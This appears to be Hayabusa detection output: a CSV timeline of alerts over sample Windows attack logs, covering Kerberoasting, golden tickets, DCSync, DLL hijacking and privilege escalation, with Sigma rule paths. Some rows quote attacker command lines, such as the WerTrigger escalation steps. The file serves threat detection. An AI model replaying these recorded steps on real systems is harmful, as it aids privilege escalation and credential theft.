+09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD 
User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes 
accessed.evtx +2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service 
Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.999 
+09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 
62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 
0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: 
gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket 
issued.evtx +2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx +2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : 